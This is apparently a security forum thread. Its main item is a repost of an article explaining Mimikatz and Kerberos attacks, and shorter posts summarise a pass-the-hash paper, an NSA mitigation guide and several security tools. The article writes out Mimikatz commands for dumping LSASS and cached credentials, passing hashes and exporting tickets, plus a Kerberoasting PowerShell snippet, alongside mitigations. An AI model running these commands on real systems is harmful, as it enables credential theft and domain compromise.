input data (the password) with the result being scrambled data that can’t be reverted back to the original input data, the password. Hashing a password into a hash is like putting a steak through a meat grinder to make ground beef – the ground beef can never be put together to be the same steak again. Pass the Hash has many variants, from Pass the Ticket to OverPass the Hash (aka pass the key). The following quote is a Google Translate English translated version of the Mimikatz website (which is in French). Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES … According to the protocol, the secret and the algorithms used are different: [TABLE] [TR] [TH] Protocol[/TH] [TH] Algorithm[/TH] [TH] Secret used[/TH] [/TR] [TR] [TD] LM[/TD] [TD] DES-ECB[/TD] [TD] LM Hash[/TD] [/TR] [TR] [TD] NTLMv1[/TD] [TD] DES-ECB[/TD] [TD] NT Hash[/TD] [/TR] [TR] [TD] NTLMv2[/TD] [TD] HMAC-MD5[/TD] [TD] NT Hash[/TD] [/TR] [/TABLE] Mimikatz OS support: Windows XP Windows Vista Windows 7 Windows 8 Windows Server 2003 Windows Server 2008 / 2008 R2 Windows Server 2012 / 2012 R2 Windows 10 (beta support) Since Windows encrypts most credentials in memory (LSASS), they should be protected, but it is a type of reversible encryption (though creds are in clear-text). Encrypt works with LsaProtectMemory and decrypt with LsaUnprotectMemory. NT5 encryption types: RC4 & DESx NT6 encryption types: 3DES & AES Mimikatz capabilities: Dump credentials from LSASS (Windows Local Security Account database) [sekurlsa module] MSV1.0: hashes & keys (dpapi) Kerberos password, ekeys, tickets, & PIN TsPkg (password) WDigest (clear-text password) LiveSSP (clear-text password) SSP (clear-text password) [*]Generate Kerberos Golden Tickets (Kerberos TGT logon token ticket attack) [*]Generate Kerberos Silver Tickets (Kerberos TGS service ticket attack) [*]Export certificates and keys (even those not normally exportable). [*]Dump cached credentials [*]Stop event monitoring. [*]Bypass Microsoft AppLocker / Software Restriction Polcies [*]Patch Terminal Server [*]Basic GPO bypass Items in bold denotes functionality provided by the PowerSploit Invoke-Mimikatz module with built-in parameters. Other mimikatz commands may work using the command parameter. Mimikatz Command Overview: The primary command components are sekurlsa, kerberos, crypto, vault, and lsadump. Sekurlsa interacts with the LSASS process in memory to gather credential data and provides enhanced capability over kerberos. The Mimikatz kerberos command set enables modification of Kerberos tickets and interacts with the official Microsoft Kerberos API. This is the command that creates Golden Tickets. Pass the ticket is also possible with this command since it can inject Kerberos ticket(s) (TGT or TGS) into the current session. External Kerberos tools may be used for session injection, but they must follow the Kerberos credential format (KRB_CRED). Mimikatz kerberos also enables the creation of Silver Tickets which are Kerberos tickets (TGT or TGS) with arbitrary data enabling AD user/ group impersonation. The key required for ticket creation depends on the type of ticket being generated: Golden tickets require the KRBTGT account NTLM password hash. Silver tickets require the computer or service account’s NTLM password hash. Crypto enables export of certificates on the system that are not marked exportable since it bypasses the standard export process. Vault enables dumping data from the Windows vault. Lsadump enables dumping credential data from the Security Account Manager (SAM) database which contains the NTLM (sometimes LM hash) and supports online and offline mode as well as dumping credential data from the LSASS process in memory. Lsadump can also be used to dump cached credentials. In a Windows domain, credentials are cached (up to 10) in case a Domain Controller is unavailable for authentication. However, these credentials are stored on the computer. These caches are located in the registry at the location HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM). These entries are encrypted symmetrically, but we find some information about the user, as well as sufficient to verify the hash authentication. Further down is a more detailed list of mimikatz command functionality. Common Kerberos Attacks: Pass The Hash On Windows, a user provides the userid and password and the password is hashed, creating the password hash. When the user on one Windows system wants to access another, the user’s password hash is sent (passed) to the destination’s resource to authenticate. This means there is no need to crack the user’s password since the user’s password hash is all that’s needed to gain access. Contrary to what could easily be imagined, Windows does not use the password of the user as a shared secret, but non-reversible derivatives: LM hash, NTLM, DES keys, AES … Pass the Ticket (Google Translation) Extract an existing, valid Kerberos ticket from one machine and pass it to another one to gain access to resoiurces as that user. Over-Pass The Hash (aka Pass the Key) (Google Translation) Use the NTLM hash to obtain a valid user Kerberos ticket request. The user key (NTLM hash when using RC4) is used to encrypt the Pre-Authentication & first data requests. The following quote is a Google Translate English translated version of the Mimikatz website (which is in French): Authentication via Kerberos is a tad different. The client encrypts a timestamp from its user secret, possibly with parameters realm and iteration number sent from the server. If the secret is correct, the server can decrypt the timestamp (and the passage verify that the clocks are not too time-shifted). [TABLE] [TR] [TH] Protocol[/TH] [TH] Secret (key) used[/TH] [/TR] [TR] [TD] Kerberos[/TD] [TD] OF[/TD] [/TR] [TR] [TD] RC4 = NT Hash![/TD] [/TR] [TR] [TD] AES128[/TD] [/TR] [TR] [TD] AES256[/TD] [/TR] [/TABLE] Yes, the RC4 key type available and enabled by default in XP 8.1 is our NT hash! Kerberos Golden Ticket (Google Translation) The Kerberos Golden Ticket is a valid TGT Kerberos ticket since it is encrypted/signed by the domain Kerberos account (KRBTGT). The TGT is only used to prove to the KDC service on the Domain Controller that the user was authenticated by another Domain Controller. The fact that the TGT is encrypted by the KRBTGT password hash and can be decrypted by any KDC service in the domain proves it is valid. Golden Ticket Requirements: * Domain Name [AD PowerShell module: (Get-ADDomain).DNSRoot] * Domain SID [AD PowerShell module: (Get-ADDomain).DomainSID.Value] * Domain KRBTGT Account NTLM password hash * UserID for impersonation. The Domain Controller KDC service doesn’t perform PAC validation until the TGT is older than 20 minutes old, which means the attacker can make the ticket state the user with the TGT is a member of any group in Active Directory and the DC accepts it (until the 21st minute) and the PAC data (group membership) is placed in the TGS without validation. Microsoft’s MS-KILE specification (section 5.1.3 ): “Kerberos V5 does not provide account revocation checking for TGS requests, which allows TGT renewals and service tickets to be issued as long as the TGT is valid even if the account has been revoked. KILE provides a check account policy (section 3.3.5.7.1) that limits the exposure to a shorter time. KILE KDCs in the account domain are required to check accounts when the TGT is older than 20 minutes. This limits the period that a client can get a ticket with a revoked account while limiting the performance cost for AD queries.” Since the domain Kerberos policy is set on the ticket when generated by the KDC service on the Domain Controller, when the ticket is provided, systems trust the ticket validity. This means that even if the domain policy states a Kerberos logon ticket (TGT) is only valid for 10 hours, if the ticket states it is valid for 10 years, it is accepted as such. The KRBTGT account password is never changed* and the attacker can create Golden Tickets until the KRBTGT password is changed (twice). Note that a Golden Ticket created to impersonate a user persists even if the impersonated user changes their password. This crafted TGT requires an attacker to have the Active Directory domain’s KRBTGT password hash (typically dumped from a Domain Controller). The KRBTGT NTLM hash can be used to generate a valid TGT (using RC4) to impersonate any user with access to any resource in Active Directory. The Golden Ticket (TGT) be generated and used on any machine, even one not domain-joined. The created TGT can be used without requiring Debug rights. Mitigation: Limit Domain Admins from logging on to any other computers other than Domain Controllers and a handful of Admin servers (don’t let other admins log on to these servers) Delegate all other rights to custom admin groups. This greatly reduces the ability of an attacker to gain access to a Domain Controller’s Active Directory database. If the attacker can’t access the AD database (ntds.dit file), they can’t get the KRBTGT account NTLM password hash. Configuring Active Directory Kerberos to only allow AES may prevent Golden Tickets from being created. Another mitigation option is Microsoft KB2871997 which back-ports some of the enhanced security in Windows 8.1 and Windows 2012 R2. Kerberos Silver Ticket The Kerberos Silver Ticket is a valid Ticket Granting Service (TGS) Kerberos ticket since it is encrypted/signed by the service account configured with a Service Principal Name for each server the Kerberos-authenticating service runs on. While a Golden ticket is encrypted/signed with the KRBTGT, a Silver Ticket is encrypted/signed by the service account (computer account credential extracted from the computer’s local SAM or service account credential). We know from the Golden Ticket attack (described above) that the PAC isn’t validated for TGTs until they are older than 20 minutes. Most services don’t validate the PAC (by sending the TGS to the Domain Controller for PAC validation), so a valid TGS generated with the service account password hash can include a PAC that is entirely fictitious – even claiming the user is a Domain Admin without challenge or correction. Since service tickets are identical in format to TGTs albeit with a different service name, all you need to do is specify a different service name and use the RC4 (NTLM hash) of the account password (either the computer account for default services or the actual account) and you can now issue service tickets for the requested service. Note: You can also use the AES keys if you happen to have them instead of the NTLM key and it will still work It is worth noting, that services like MSSQL, Sharepoint, etc will only allow you to play with those services. The computer account will allow access to CIFS, service creation, and a whole host of other activities on the targeted computer. You can leverage the computer account into a shell with PSEXEC and you will be running as system on that particular computer. Lateral movement is then a matter of doing whatever you need to do from there http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-and.html Service Account Password Cracking by attacking the Kerberos Session Ticket (TGS) NOTE: This attack does NOT require hacking tools on the network since it can be performed offline. The Kerberos session ticket (TGS) has a component that is encrypted with the service’s (either computer account or service account) password hash. The TGS for the service is generated and delivered to the user after the user’s TGT is presented to the KDC service on the Domain Controller. Since the service account’s password hash is used to encrypt the server component, it is possible to request the service TGS and perform an offline password attack. Only normal Kerberos traffic is observed on the wire: the TGT is delivered to the Domain Controller along with a TGS request and response. At this point, no further network traffic is required. Service accounts typically have weak passwords and are rarely changed making these excellent targets. Computer account passwords are changed about every 30 days and are extremely complex making them virtually uncrackable. Finding interesting service accounts is as simple as sending a Service Principal Name query to the Global Catalog. Service accounts often have elevated rights in Active Directory and since only a Kerberos service ticket (TGS) is required to attack the service account’s password, getting a TGS and saving it to another system to crack the password means this is a difficult attack to stop. Mitigation: Ensure all service accounts have long (>25 characters), complex passwords and only have the exact rights required (ensure the principle of least privilege). Tim Medin (@timmedin) describes this attack at his “Attacking Microsoft Kerberos: Kicking the Guard Dog of Hades” presentation at DerbyCon 2014. [slides: https://www.dropbox.com/s/1j6v6zbtsdg1kam/Kerberoast.pdf?dl=0 ] In his DerbyCon2014 presentation, Tim Medin provided PowerShell code examples for requesting a TGS. I have modified it slightly to add the $SPN variable. $SPN = “HTTP/sharepoint.adsecurity.org” Add-Type -AssemblyNAme System.IdentityModel New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList “$SPN” Pass the Cache (*nix systems) Linux/Unix systems (Mac OSX) store Kerberos credentials in a cache file. As of 11/23/2014, Mimikatz supports extracting the credential data for passing to Active Directory in a similar manner to the Pass the Hash/ Pass the Ticket method. Mimikatz Commands: logonpasswords: mimikatz # sekurlsa::logonpasswords) Extracts passwords in memory [*]pth (pass the hash): mimikatz # sekurlsa::pth /user:Administrateur /domain:chocolate.local /ntlm:cc36cf7a8514893efccd332446158b1a A fake identity is created and the faske identitt’s NTLM hash is replaced with the real one. “ntlm hash is mandatory on XP/2003/Vista/2008 and before 7/2008r2/8/2012 kb2871997 (AES not available or replaceable)” “AES keys can be replaced only on 8.1/2012r2 or 7/2008r2/8/2012 with kb2871997, in this case you can avoid ntlm hash.” [*]ptt (pass the ticket): mimikatz # kerberos::ptt Enables Kerberos ticket (TGT or TGS) injection into the current session. [*]tickets: mimikatz # sekurlsa::tickets /export Identifies all session Kerberos tickets and lists/exports them. sekurlsa pulls the Kerberos data from memory and can access all user session tickets on the computer. [*]ekeys: mimikatz # sekurlsa::ekeys Extract the Kerberos ekeys from memory. Provides theft of a user account until the password is changed (which may be never for a Smartcard/PKI user). [*]dpapi: mimikatz # sekurlsa::dpapi [*]minidump: mimikatz # sekurlsa::minidump lsass.dmp Perform a minidump of the LSASS process and extract credential data from the lsass.dmp. A minidump can be saved off the computer for credential extraction later, but the major version of Windows must match (you can’t open the dump file from Windows 2012 on a Windows 2008 system). [*]kerberos: mimikatz # sekurlsa::kerberos Extracts the smartcad/PIV PIN from memory (cached in LSASS when using a smartcard). [*]debug: mimikatz # privilege::debug Sets debug mode for current mimikatz session enabling LSASS access. [*]lsadump cache: (requires token::elevate to be SYSTEM) mimikatz # lsadump::cache Dumps cached Windows domain credentials from HKEY_LOCAL_MACHINE\SECURITY\Cache (accessible SYSTEM). References: Benjamin Delpy’s blog (Google Translate English translated version) Mimikatz GitHub repository Mimikatz Github wiki Mimikatz 2 Presentation Slides (Benjamin Delpy, July 2014) All Mimikatz Presentation resources on blog.gentilkiwi.com Excel chart on OneDrive that shows what type of credential data is available in memory (LSASS), including on Windows 8.1 and Windows 2012 R2 which have enhanced protection mechanisms. PAC Validation issue aka the Silver Ticket description from the Passing the Hash Blog Sursa: http://adsecurity.org/?p=556
-
Pass-the-hash attacks: Tools and Mitigation Although pass-the-hash attacks have been around for a little over thirteen years, the knowledge of its existence is still poor. This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides exte... Copyright SANS Institute Author Retains Full Rights Pass-the-hash attacks: Tools and Mitigation GIAC (GCIH) Gold Certification Author: Bashar Ewaida, bashar9090@live.com Advisor: Kristof Boeynaems Accepted: January 21st 2010 Abstract Although pass-*?the-*?hash attacks have been around for a little over thirteen years, the knowledge of its existence is still poor. This paper tries to fill a gap in the knowledge of this attack through the testing of the freely available tools that facilitate the attack. While other papers and resources focus primarily on running the tools and sometimes comparing them, this paper offers an in-*?depth, systematic comparison of the tools across the various Windows platforms, including AV detection rates. It also provides extensive advice to mitigate pass-*?the-*?hash attacks and discusses the pros and cons of some of the approaches used in mitigating the attack. Download: https://www.sans.org/reading-room/whitepapers/testing/pass-the-hash-attacks-tools-mitigation-33283
-
Reducing the Effectiveness of Pass-the-Hash National Security Agency/Central Security Service Information Assurance Directorate Contents 1 Introduction .......................................................................................................................................... 1 2 Background ........................................................................................................................................... 1 3 Mitigations ............................................................................................................................................ 2 3.1 Creating unique local account passwords .................................................................................... 3 3.2 Denying local accounts from network logons ............................................................................... 4 3.3 Restricting lateral movement on the network with firewall rules ................................................ 5 4 Windows 8.1 Features .......................................................................................................................... 5 4.1 Deny local accounts from network logons in Windows 8.1 .......................................................... 5 4.2 New Remote Desktop feature in Windows 8.1 ............................................................................ 5 4.3 Protecting LSASS ........................................................................................................................... 6 4.4 Clearing credentials....................................................................................................................... 6 4.5 Protected Users group .................................................................................................................. 6 5 Conclusion ............................................................................................................................................. 7 6 References ............................................................................................................................................ 7 Appendix A: Creating unique local passwords .............................................................................................. 7 Appendix B: Denying local administrators network access .......................................................................... 8 Appendix C: Configuring Windows Firewall rules ......................................................................................... 9 Appendix D: Looking for possible PtH activity by examining Windows Event Logs ................................... 12 Appendix E: Summary of Local Accounts .................................................................................................... 12 Appendix F: Windows smartcard credentials ............................................................................................. 12 Download: https://www.nsa.gov/ia/_files/app/Reducing_the_Effectiveness_of_Pass-the-Hash.pdf
-
[h=3]WPScan[/h] WPScan is a black box WordPress vulnerability scanner. Features Username enumeration (from author querystring and location header) Weak password cracking (multithreaded) Version enumeration (from generator meta tag and from client side files) Vulnerability enumeration (based on version) Plugin enumeration (2220 most popular by default) Plugin vulnerability enumeration (based on plugin name) Plugin enumeration list generation Other misc WordPress checks (theme name, dir listing, …) URL: http://wpscan.org Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]Brakeman[/h] Brakeman is a security scanner for Ruby on Rails applications. Unlike many web security scanners, Brakeman looks at the source code of your application. This means you do not need to set up your whole application stack to use it. Once Brakeman scans the application code, it produces a report of all security issues it has found. Features No Configuration Necessary Run It Anytime Better Coverage Best Practices Flexible Testing Speed URL: http://brakemanscanner.org Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]OWASP Offensive (Web) Testing Framework[/h] OWASP OWTF, Offensive (Web) Testing Framework is an OWASP+PTES-focused try to unite great tools and make pen testing more efficient, written mostly in Python. The purpose of this tool is to automate the manual, uncreative part of pen testing: For example, spending time trying to remember how to call “tool X”, parsing results of “tool X” manually to feed “tool Y”, etc. Features OWASP Testing Guide-oriented. Report updated on the fly. “Scumbag spidering”. Resilience. Easy to configure. Easy to run. Full control of what tests to run. Easy to review transaction logs and plain text files with URLs. Basic Google Hacking without (annoying) API Key requirements via “blanket searches”. Easy to extract data from the database to parse or pass to other tools. URL: https://www.owasp.org/index.php/OWASP_OWTF Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers
-
[h=3]PeStudio[/h] PeStudio is a unique tool that performs the static investigation of 32-bit and 64-bit executable. PEStudio is free for private non-commercial use only. Malicious executable often attempts to hide its malicious behavior and to evade detection. In doing so, it generally presents anomalies and suspicious patterns. The goal of PEStudio is to detect these anomalies, provide Indicators and score the Trust for the executable being analyzed. Since the executable file being analyzed is never started, you can inspect any unknown or malicious executable with no risk. Features References Indicators Virus Detection Imports Resources Report Prompt Interface URL: winitor Sursa: ToolsWatch.org – The Hackers Arsenal Tools Portal » 2014 Top Security Tools as Voted by ToolsWatch.org Readers